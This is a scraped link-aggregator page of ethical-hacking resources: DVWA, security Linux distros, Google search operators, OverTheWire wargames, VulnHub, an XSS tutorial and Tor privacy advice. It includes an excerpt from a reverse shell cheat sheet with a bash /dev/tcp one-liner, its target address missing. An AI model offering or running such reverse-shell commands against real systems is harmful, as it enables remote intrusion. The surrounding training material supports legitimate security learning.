background preloader

DVWA - Damn Vulnerable Web Application

DVWA - Damn Vulnerable Web Application
Related:  Ethical Hacking

Damn Vulnerable Web App The Cryptopals Crypto Challenges BlackArch - ArchWiki - Vimperator Specialty Distributions alphaOS alphaOS is a simple and minimalistic Linux distribution for the x86-64 architecture, built using Linux Live Kit set of scripts developed by Tomas M. It is based on Arch Linux and uses pacman as the default package manager. Antergos Antergos is an elegant and very customizable system for desktop. ArchAssault ArchAssault, everything you love about Arch Linux but with the security professional and hackers in mind. The ARM line is to help you build the security devices of your dreams with many Open Source devices on the market. ArchBang ArchBang LIVE CD = Arch Linux w/ Openbox (the name is inspired by CrunchBang Linux, which is Debian Linux w/ Openbox) ArchEX ArchEX, based on Arch Linux, is one of the Linux Live DVDs created by C.A. Homepage: Screenshot: DistroWatch Entry: Arch Linux ARM Arch Linux ARM is the new unified effort from PlugApps & ArchMobile. archboot BBQLinux

NewbieContest : Challenge informatique francophone Google Search Operators - Google Guide - Vimperator The following table lists the search operators that work with each Google search service. Click on an operator to jump to its description — or, to read about all of the operators, simply scroll down and read all of this page. The following is an alphabetical list of the search operators. This list includes operators that are not officially supported by Google and not listed in Google’s online help. Each entry typically includes the syntax, the capabilities, and an example. allinanchor: If you start your query with allinanchor:, Google restricts results to pages containing all query terms you specify in the anchor text on links to the page. Anchor text is the text on a page that is linked to another web page or a different place on the current page. allintext: If you start your query with allintext:, Google restricts results to those containing all the query terms you specify in the text of the page. allintitle: allinurl: In URLs, words are often run together. author: cache: define: ext: group:

OverTheWire: Wargames We're hackers, and we are good-looking. We are the 1%. The wargames offered by the OverTheWire community can help you to learn and practice security concepts in the form of fun-filled games. If you have a problem, a question or a suggestion, you can join us on IRC. Suggested order to play the games in Bandit Leviathan or Natas or Krypton Narnia Behemoth Utumno Maze … Each shell game has its own SSH port Information about how to connect to each game using SSH, is provided in the top left corner of the page.

Reverse Shell Cheat Sheet If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell. If it’s not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either trowing back a reverse shell or binding a shell to a TCP port. This page deals with the former. Your options for creating a reverse shell are limited by the scripting languages installed on the target system – though you could probably upload a binary program too if you’re suitably well prepared. The examples shown are tailored to Unix-like systems. Each of the methods below is aimed to be a one-liner that you can copy/paste. Bash Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10): bash -i >& /dev/tcp/ 0>&1 Here’s a shorter, feature-free version of the perl-reverse-shell: There’s also an alternative PERL revere shell here. Python This was tested under Linux / Python 2.7:

Vulnerable By Design ~ VulnHub Excess XSS: A comprehensive tutorial on cross-site scripting - Vimperator Tor best practices | Privacy in Digital Era Your Computer To date the NSA’s and FBI’s primary attacks on Tor users have been MITM attacks (NSA) and hidden service web server compromises (FBI) which either sent tracking data to the Tor user’s computer, compromised it, or both. Thus you need a reasonably secure system from which you can use Tor and reduce your risk of being tracked or compromised. Don’t use Windows. Just don’t. Your Environment Tor contains weaknesses which can only be mitigated through actions in the physical world. Never use Tor from home, or near home. Your Mindset Many Tor users get caught because they made a mistake, such as posting their real email address in association with their activities. Think of your Tor activity as pseudonymous, and create in your mind a virtual identity to correspond with the activity. Hidden Services These are big in the news lately, with the recent takedown of at least two high-profile hidden services, Silk Road and Freedom Hosting. What can you do? Privacy in Digital Era Get it! Source